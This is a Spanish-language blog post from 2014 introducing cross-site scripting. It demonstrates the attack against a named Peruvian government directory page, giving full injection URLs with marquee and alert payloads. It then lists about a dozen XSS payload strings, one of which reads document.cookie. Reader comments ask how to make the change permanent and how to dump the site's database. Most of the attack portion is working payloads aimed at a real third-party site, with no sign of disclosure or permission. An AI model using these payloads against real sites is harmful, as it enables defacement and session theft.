lunes, 20 de enero de 2014

Cross-site scripting - XSS



Cross-site scripting Es un error típico de algunas paginas web ya que crea otro portal donde la web es afectada por una explotación " XSS" puede ser modificado en otro plano de web  por medio de script
peligrosos en Html.

Existen dos tipos de XSS

Directa - ( llamada también persistente) Es un tipo de xss que permite insertar los codigos html que permitan insertar " <Script> "  o " <Iflame>


Indirecta  ( llamada tambien reflejada )  Este tipo de xss consiste modificar valores que esten en la pagina web para pasar dos variables de paginas web .




Como saber si una web es vulnerable a un XSS


Para ello existen varios Scanners que nos pueden servir de mucha ayuda para encontrar este tipo de errores.
una vez encontrada una vulnerable a xss web.

Como veran esta web se ve normal :




http://www.peru.gob.pe/directorio/pep_directorio_ent_busq.asp?pag=2&bloquePag=0&dsc_institucion=

pero ojo  es vulnerable a una explotación Cross-site scripting . ustedes se preguntaran como ??
Bueno si se fijan este parámetro > pag=2&bloquePag=0&dsc_institucion=    esto nos  brinda insertar un script .

Pero Que Script se preguntaran ustedes para ello hay muchos script la cual pueden insertar ejemplo :


Marquee ( mostrar mensaje de texto en movimiento ) <marquee>XSS DETECTADO</marquee>


http://www.peru.gob.pe/directorio/pep_directorio_ent_busq.asp?pag=2&bloquePag=0&dsc_institucion=%3Cmarquee%3EXSS%20DETECTADO%3C/marquee%3E


ALERT ( Mostrar mensaje de alerta en el sitio web   ) <script>alert(String.fromCharCode(88,83,83))</script>

http://www.peru.gob.pe/directorio/pep_directorio_ent_busq.asp?pag=2&bloquePag=0&dsc_institucion=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E






















Mayormente el mensaje Alert  es utilizado mayormente para enviar el mensaje que es vulnerable el sitio web .


Vectores de Alert :

XSS GET :

'"></title><script>alert(1111)</script>
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>
<script>alert('XSS');</script>
<script>alert(String.fromCharCode(88,83,83))</script>
'">><script>alert('XSS')</script> 
'></select><script>alert(123)</script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>

4 comentarios:

  1. GRacias por el post es muy bueno no sabia exactamente eso del xss gracias (Y)

    ResponderEliminar
  2. muy bueno pero la verdad no tengo idea de como hacer que quede permanente la modificacion :L

    ResponderEliminar
  3. gracias,,.. pero como aplico para hacer Inyeccion y sacar su base de datos ?

    ResponderEliminar

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares